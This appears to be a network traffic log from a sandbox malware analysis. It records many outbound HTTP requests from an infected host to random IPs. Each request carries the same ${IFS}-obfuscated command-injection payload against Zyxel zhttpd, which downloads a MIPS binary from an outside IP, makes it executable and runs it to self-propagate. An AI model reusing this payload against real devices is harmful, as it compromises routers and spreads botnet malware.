                                                  Jan 19, 2024 18:24:00.151098013 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5575192.168.2.1346954114.118.82.37443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:00.151130915 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5576192.168.2.1339060218.174.126.252443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:00.151170969 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5577192.168.2.1346060108.104.30.194443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:00.151206017 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5578192.168.2.1353640126.130.160.133443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:00.151235104 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5579192.168.2.1360584109.123.177.139443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:00.151282072 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5580192.168.2.1355796219.180.139.137443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:00.151314020 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5581192.168.2.134274854.121.165.218443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:00.151377916 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5582192.168.2.1336210101.126.168.158443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:00.151400089 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5583192.168.2.134981478.75.128.205443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:00.151437044 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5584192.168.2.135491467.11.91.128443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:00.151479959 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5585192.168.2.136049818.174.154.156443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:00.151496887 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5586192.168.2.1333558139.240.171.252443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:00.151551008 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5587192.168.2.1346288130.207.232.17443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:00.151582003 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5588192.168.2.1342234159.125.26.214443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:00.151645899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5589192.168.2.135756684.208.23.129443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:00.151690960 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5590192.168.2.133994844.153.97.114443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:00.151730061 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5591192.168.2.1347592205.244.236.89443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:00.151762009 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5592192.168.2.134777284.113.118.170443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:00.151786089 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5593192.168.2.135067474.62.185.48443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:00.151844978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5594192.168.2.1342976135.106.196.172443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:00.151875973 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5595192.168.2.134759686.255.8.180443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:00.155272007 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5596192.168.2.1356516194.138.163.151443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:00.155304909 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5597192.168.2.133636427.195.227.31443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:00.155338049 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5598192.168.2.1337280187.220.158.237443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:01.164216042 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5599192.168.2.1344264136.28.39.10443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:01.164275885 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5600192.168.2.1339968186.200.180.164443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:01.164324999 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5601192.168.2.1357594159.140.78.143443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:01.164347887 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5602192.168.2.1335186188.74.53.5443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:01.164376974 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5603192.168.2.1341466196.79.174.66443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:01.164433002 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5604192.168.2.1347842144.8.133.75443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:01.164460897 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5605192.168.2.1360890120.173.87.234443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:01.164516926 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5606192.168.2.135696818.229.174.220443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:01.164544106 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5607192.168.2.1346268216.34.137.245443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:01.164583921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5608192.168.2.134706867.36.187.188443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:01.164618969 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5609192.168.2.133395058.76.20.122443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:01.164663076 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5610192.168.2.1336842114.67.21.158443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:01.164690018 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5611192.168.2.1344246217.201.239.79443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:01.164710999 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5612192.168.2.136021067.201.233.103443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:01.164757013 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5613192.168.2.1347972140.246.118.171443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:01.164798021 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5614192.168.2.1349362221.144.117.137443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:01.164849043 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5615192.168.2.1351136164.161.187.121443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:01.164887905 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5616192.168.2.1350616198.8.219.123443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:01.164936066 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5617192.168.2.1356928188.4.117.21443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:01.164995909 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5618192.168.2.13581821.109.220.199443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:01.165041924 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5619192.168.2.135429451.192.120.39443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:01.165088892 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5620192.168.2.1351772186.41.46.89443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:01.165133953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5621192.168.2.136057225.161.177.43443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:01.165183067 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5622192.168.2.1336980129.254.60.247443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:01.165225029 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5623192.168.2.1344992106.18.9.172443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:01.165261984 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5624192.168.2.1352234155.33.169.199443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:01.165297031 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5625192.168.2.1346556180.41.126.4443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:01.165364027 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5626192.168.2.135390879.187.29.179443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:01.165369034 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5627192.168.2.135004262.234.240.22443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:01.165390968 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5628192.168.2.1337856218.217.29.146443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:01.165410042 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5629192.168.2.134487457.117.17.146443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:01.165460110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5630192.168.2.1345172213.146.139.70443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:01.165488958 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5631192.168.2.135180045.198.117.82443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:01.165522099 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5632192.168.2.1360984115.162.68.144443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:01.165550947 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5633192.168.2.136067286.221.108.136443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:01.165596962 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5634192.168.2.1351496134.75.215.179443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:01.165642977 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5635192.168.2.1341396202.185.90.153443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:01.165673971 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5636192.168.2.1358936151.175.73.63443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:01.165723085 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5637192.168.2.134649671.45.204.250443
                                                  TimestampBytes transferredDirectionData
